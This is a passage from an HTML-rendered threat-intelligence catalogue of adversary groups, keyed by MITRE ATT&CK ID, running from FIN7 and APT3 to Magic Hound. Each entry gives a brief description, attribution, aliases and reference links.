<p>FIN7 is a financially motivated threat group that has primarily targeted the retail and hospitality sectors, often using point-of-sale malware. It is sometimes referred to as Carbanak Group, but these appear to be two groups using the same Carbanak malware and are therefore tracked separately. (Citation: FireEye FIN7 March 2017) (Citation: FireEye FIN7 April 2017)</p>
</div>
<div class="paragraph">
<p>FIN7 - G0046 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>FIN7</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 946. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0046">https://attack.mitre.org/wiki/Group/G0046</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/03/fin7%20spear%20phishing.html">https://www.fireeye.com/blog/threat-research/2017/03/fin7%20spear%20phishing.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html">https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt3_g0022"><a class="anchor" href="#_apt3_g0022"></a><a class="link" href="#_apt3_g0022">APT3 - G0022</a></h3>
<div class="paragraph">
<p>APT3 is a China-based threat group that researchers have attributed to China&#8217;s Ministry of State Security. (Citation: FireEye Clandestine Wolf) (Citation: Recorded Future APT3 May 2017) This group is responsible for the campaigns known as Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap. (Citation: FireEye Clandestine Wolf) (Citation: FireEye Operation Double Tap) As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong. (Citation: Symantec Buckeye)</p>
</div>
<div class="literalblock">
<div class="content">
<pre>(Citation: APT3 Adversary Emulation Plan)</pre>
</div>
</div>
<div class="paragraph">
<p>APT3 - G0022 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT3</p>
</li>
<li>
<p>Gothic Panda</p>
</li>
<li>
<p>Pirpi</p>
</li>
<li>
<p>UPS Team</p>
</li>
<li>
<p>Buckeye</p>
</li>
<li>
<p>Threat Group-0110</p>
</li>
<li>
<p>TG-0110</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 947. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0022">https://attack.mitre.org/wiki/Group/G0022</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html">https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.recordedfuture.com/chinese-mss-behind-apt3/">https://www.recordedfuture.com/chinese-mss-behind-apt3/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2014/11/operation%20doubletap.html">https://www.fireeye.com/blog/threat-research/2014/11/operation%20doubletap.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong">http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/w/img%20auth.php/6/6c/APT3%20Adversary%20Emulation%20Plan.pdf">https://attack.mitre.org/w/img%20auth.php/6/6c/APT3%20Adversary%20Emulation%20Plan.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gcman_g0036"><a class="anchor" href="#_gcman_g0036"></a><a class="link" href="#_gcman_g0036">GCMAN - G0036</a></h3>
<div class="paragraph">
<p>GCMAN is a threat group that focuses on targeting banks for the purpose of transferring money to e-currency services. (Citation: Securelist GCMAN)</p>
</div>
<div class="paragraph">
<p>GCMAN - G0036 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>GCMAN</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 948. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0036">https://attack.mitre.org/wiki/Group/G0036</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/73638/">https://securelist.com/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/73638/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032"><a class="anchor" href="#_lazarus_group_g0032"></a><a class="link" href="#_lazarus_group_g0032">Lazarus Group - G0032</a></h3>
<div class="paragraph">
<p>Lazarus Group is a threat group that has been attributed to the North Korean government. (Citation: US-CERT HIDDEN COBRA June 2017) The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by Lazarus Group correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. (Citation: Novetta Blockbuster)</p>
</div>
<div class="paragraph">
<p>Lazarus Group - G0032 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Lazarus Group</p>
</li>
<li>
<p>HIDDEN COBRA</p>
</li>
<li>
<p>Guardians of Peace</p>
</li>
<li>
<p>ZINC</p>
</li>
<li>
<p>NICKEL ACADEMY</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 949. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0032">https://attack.mitre.org/wiki/Group/G0032</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.us-cert.gov/ncas/alerts/TA17-164A">https://www.us-cert.gov/ncas/alerts/TA17-164A</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf">https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lotus_blossom_g0030"><a class="anchor" href="#_lotus_blossom_g0030"></a><a class="link" href="#_lotus_blossom_g0030">Lotus Blossom - G0030</a></h3>
<div class="paragraph">
<p>Lotus Blossom is a threat group that has targeted government and military organizations in Southeast Asia. (Citation: Lotus Blossom Jun 2015)</p>
</div>
<div class="paragraph">
<p>Lotus Blossom - G0030 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Lotus Blossom</p>
</li>
<li>
<p>Spring Dragon</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 950. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0030">https://attack.mitre.org/wiki/Group/G0030</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html">https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_equation_g0020"><a class="anchor" href="#_equation_g0020"></a><a class="link" href="#_equation_g0020">Equation - G0020</a></h3>
<div class="paragraph">
<p>Equation is a sophisticated threat group that employs multiple remote access tools. The group is known to use zero-day exploits and has developed the capability to overwrite the firmware of hard disk drives. (Citation: Kaspersky Equation QA)</p>
</div>
<div class="paragraph">
<p>Equation - G0020 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Equation</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 951. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0020">https://attack.mitre.org/wiki/Group/G0020</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/files/2015/02/Equation%20group%20questions%20and%20answers.pdf">https://securelist.com/files/2015/02/Equation%20group%20questions%20and%20answers.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_darkhotel_g0012"><a class="anchor" href="#_darkhotel_g0012"></a><a class="link" href="#_darkhotel_g0012">Darkhotel - G0012</a></h3>
<div class="paragraph">
<p>Darkhotel is a threat group that has been active since at least 2004. The group has conducted activity on hotel and business center WiFi and physical connections as well as peer-to-peer and file sharing networks. The actors have also conducted spearphishing. (Citation: Kaspersky Darkhotel)</p>
</div>
<div class="paragraph">
<p>Darkhotel - G0012 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Darkhotel</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 952. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0012">https://attack.mitre.org/wiki/Group/G0012</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/files/2014/11/darkhotel%20kl%2007.11.pdf">https://securelist.com/files/2014/11/darkhotel%20kl%2007.11.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dragonfly_g0035"><a class="anchor" href="#_dragonfly_g0035"></a><a class="link" href="#_dragonfly_g0035">Dragonfly - G0035</a></h3>
<div class="paragraph">
<p>Dragonfly is a cyber espionage group that has been active since at least 2011. They initially targeted defense and aviation companies but shifted to focus on the energy sector in early 2013. They have also targeted companies related to industrial control systems. The group appeared to decrease activity following public exposure in 2014, and re-emerged in late 2015 through 2017. (Citation: Symantec Dragonfly) (Citation: Symantec Dragonfly) Sept 2017</p>
</div>
<div class="paragraph">
<p>Dragonfly - G0035 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Dragonfly</p>
</li>
<li>
<p>Energetic Bear</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 953. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0035">https://attack.mitre.org/wiki/Group/G0035</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/Dragonfly%20Threat%20Against%20Western%20Energy%20Suppliers.pdf">http://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/Dragonfly%20Threat%20Against%20Western%20Energy%20Suppliers.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_suckfly_g0039"><a class="anchor" href="#_suckfly_g0039"></a><a class="link" href="#_suckfly_g0039">Suckfly - G0039</a></h3>
<div class="paragraph">
<p>Suckfly is a China-based threat group that has been active since at least 2014. (Citation: Symantec Suckfly March 2016)</p>
</div>
<div class="paragraph">
<p>Suckfly - G0039 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Suckfly</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 954. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0039">https://attack.mitre.org/wiki/Group/G0039</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates">http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_stealth_falcon_g0038"><a class="anchor" href="#_stealth_falcon_g0038"></a><a class="link" href="#_stealth_falcon_g0038">Stealth Falcon - G0038</a></h3>
<div class="paragraph">
<p>Stealth Falcon is a threat group that has conducted targeted spyware attacks against Emirati journalists, activists, and dissidents since at least 2012. Circumstantial evidence suggests there could be a link between this group and the United Arab Emirates (UAE) government, but that has not been confirmed. (Citation: Citizen Lab Stealth Falcon May 2016)</p>
</div>
<div class="paragraph">
<p>Stealth Falcon - G0038 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Stealth Falcon</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 955. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0038">https://attack.mitre.org/wiki/Group/G0038</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://citizenlab.org/2016/05/stealth-falcon/">https://citizenlab.org/2016/05/stealth-falcon/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bronze_butler_g0060"><a class="anchor" href="#_bronze_butler_g0060"></a><a class="link" href="#_bronze_butler_g0060">BRONZE BUTLER - G0060</a></h3>
<div class="paragraph">
<p>BRONZE BUTLER is a cyber espionage group with likely Chinese origins that has been active since at least 2008. The group primarily targets Japanese organizations, particularly those in government, biotechnology, electronics manufacturing, and industrial chemistry. (Citation: Trend Micro Daserf Nov 2017) (Citation: Secureworks BRONZE BUTLER Oct 2017)</p>
</div>
<div class="paragraph">
<p>BRONZE BUTLER - G0060 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>BRONZE BUTLER</p>
</li>
<li>
<p>REDBALDKNIGHT</p>
</li>
<li>
<p>Tick</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 956. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0060">https://attack.mitre.org/wiki/Group/G0060</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/">http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses">https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_scarlet_mimic_g0029"><a class="anchor" href="#_scarlet_mimic_g0029"></a><a class="link" href="#_scarlet_mimic_g0029">Scarlet Mimic - G0029</a></h3>
<div class="paragraph">
<p>Scarlet Mimic is a threat group that has targeted minority rights activists. This group has not been directly linked to a government source, but the group&#8217;s motivations appear to overlap with those of the Chinese government. While there is some overlap between IP addresses used by Scarlet Mimic and Putter Panda, it has not been concluded that the groups are the same. (Citation: Scarlet Mimic Jan 2016)</p>
</div>
<div class="paragraph">
<p>Scarlet Mimic - G0029 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Scarlet Mimic</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 957. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0029">https://attack.mitre.org/wiki/Group/G0029</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/">http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_threat_group_1314_g0028"><a class="anchor" href="#_threat_group_1314_g0028"></a><a class="link" href="#_threat_group_1314_g0028">Threat Group-1314 - G0028</a></h3>
<div class="paragraph">
<p>Threat Group-1314 is an unattributed threat group that has used compromised credentials to log into a victim&#8217;s remote access infrastructure. (Citation: Dell TG-1314)</p>
</div>
<div class="paragraph">
<p>Threat Group-1314 - G0028 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Threat Group-1314</p>
</li>
<li>
<p>TG-1314</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 958. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0028">https://attack.mitre.org/wiki/Group/G0028</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/resources/blog/living-off-the-land/">http://www.secureworks.com/resources/blog/living-off-the-land/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_turla_g0010"><a class="anchor" href="#_turla_g0010"></a><a class="link" href="#_turla_g0010">Turla - G0010</a></h3>
<div class="paragraph">
<p>Turla is a threat group that has infected victims in over 45 countries, spanning a range of industries including government, embassies, military, education, research and pharmaceutical companies. They are known for conducting watering hole and spearphishing campaigns. (Citation: Kaspersky Turla) (Citation: ESET Gazer Aug 2017)</p>
</div>
<div class="paragraph">
<p>Turla - G0010 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Turla</p>
</li>
<li>
<p>Waterbug</p>
</li>
<li>
<p>WhiteBear</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 959. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0010">https://attack.mitre.org/wiki/Group/G0010</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/the-epic-turla-operation/65545/">https://securelist.com/the-epic-turla-operation/65545/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf">https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt29_g0016"><a class="anchor" href="#_apt29_g0016"></a><a class="link" href="#_apt29_g0016">APT29 - G0016</a></h3>
<div class="paragraph">
<p>APT29 is threat group that has been attributed to the Russian government and has operated since at least 2008. (Citation: F-Secure The Dukes) (Citation: GRIZZLY STEPPE JAR) This group reportedly compromised the Democratic National Committee starting in the summer of 2015. (Citation: Crowdstrike DNC June 2016)</p>
</div>
<div class="paragraph">
<p>APT29 - G0016 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT29</p>
</li>
<li>
<p>The Dukes</p>
</li>
<li>
<p>Cozy Bear</p>
</li>
<li>
<p>CozyDuke</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 960. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0016">https://attack.mitre.org/wiki/Group/G0016</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf">https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/">https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_menupass_g0045"><a class="anchor" href="#_menupass_g0045"></a><a class="link" href="#_menupass_g0045">menuPass - G0045</a></h3>
<div class="paragraph">
<p>menuPass is a threat group that appears to originate from China and has been active since approximately 2009. The group has targeted healthcare, defense, aerospace, and government sectors, and has targeted Japanese victims since at least 2014. In 2016 and 2017, the group targeted managed IT service providers, manufacturing and mining companies, and a university. (Citation: Palo Alto menuPass Feb 2017) (Citation: Crowdstrike CrowdCast Oct 2013) (Citation: FireEye Poison Ivy) (Citation: PWC Cloud Hopper April 2017) (Citation: FireEye APT10 April 2017)</p>
</div>
<div class="paragraph">
<p>menuPass - G0045 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>menuPass</p>
</li>
<li>
<p>Stone Panda</p>
</li>
<li>
<p>APT10</p>
</li>
<li>
<p>Red Apollo</p>
</li>
<li>
<p>CVNX</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 961. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0045">https://attack.mitre.org/wiki/Group/G0045</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/">http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem">https://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf">https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf">https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/04/apt10%20menupass%20grou.html">https://www.fireeye.com/blog/threat-research/2017/04/apt10%20menupass%20grou.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_putter_panda_g0024"><a class="anchor" href="#_putter_panda_g0024"></a><a class="link" href="#_putter_panda_g0024">Putter Panda - G0024</a></h3>
<div class="paragraph">
<p>Putter Panda is a Chinese threat group that has been attributed to Unit 61486 of the 12th Bureau of the PLAs 3rd General Staff Department (GSD). (Citation: CrowdStrike Putter Panda)</p>
</div>
<div class="paragraph">
<p>Putter Panda - G0024 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Putter Panda</p>
</li>
<li>
<p>APT2</p>
</li>
<li>
<p>MSUpdater</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 962. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0024">https://attack.mitre.org/wiki/Group/G0024</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf">http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_axiom_g0001"><a class="anchor" href="#_axiom_g0001"></a><a class="link" href="#_axiom_g0001">Axiom - G0001</a></h3>
<div class="literalblock">
<div class="content">
<pre>(Citation: Axiom) is a cyber espionage group suspected to be associated with the Chinese government. It is responsible for the Operation SMN campaign. (Citation: Axiom) Though both this group and Winnti Group use the malware Winnti, the two groups appear to be distinct based on differences in reporting on the groups' TTPs and targeting. (Citation: Kaspersky Winnti April 2013) (Citation: Kaspersky Winnti June 2015) (Citation: Novetta Winnti April 2015)</pre>
</div>
</div>
<div class="paragraph">
<p>Axiom - G0001 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Axiom</p>
</li>
<li>
<p>Group 72</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 963. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0001">https://attack.mitre.org/wiki/Group/G0001</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.novetta.com/wp-content/uploads/2014/11/Executive%20Summary-Final%201.pdf">http://www.novetta.com/wp-content/uploads/2014/11/Executive%20Summary-Final%201.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/winnti-more-than-just-a-game-130410.pdf">https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/winnti-more-than-just-a-game-130410.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/games-are-over/70991/">https://securelist.com/games-are-over/70991/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.novetta.com/wp-content/uploads/2015/04/novetta%20winntianalysis.pdf">http://www.novetta.com/wp-content/uploads/2015/04/novetta%20winntianalysis.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_magic_hound_g0059"><a class="anchor" href="#_magic_hound_g0059"></a><a class="link" href="#_magic_hound_g0059">Magic Hound - G0059</a></h3>
<div class="paragraph">
<p>Magic Hound is an espionage campaign operating primarily in the Middle East that dates back to at least mid-2016. The group behind the campaign has primarily targeted organizations in the energy, government, and technology sectors that are either based or have business interests in Saudi Arabia. (Citation: Unit 42 Magic Hound Feb 2017)</p>
</div>
<div class="paragraph">
<p>Contributors: Bryan Lee</p>
</div>
<div class="paragraph">
<p>Magic Hound - G0059 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Magic Hound</p>
</li>
<li>
<p>Rocket Kitten</p>
</li>
<li>
<p>Operation Saffron Rose</p>
</li>
<li>
<p>Ajax Security Team</p>
</li>
<li>
<p>Operation Woolen-Goldfish</p>
</li>
<li>
<p>Newscaster</p>
</li>
<li>
<p>Cobalt Gypsy</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 964. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
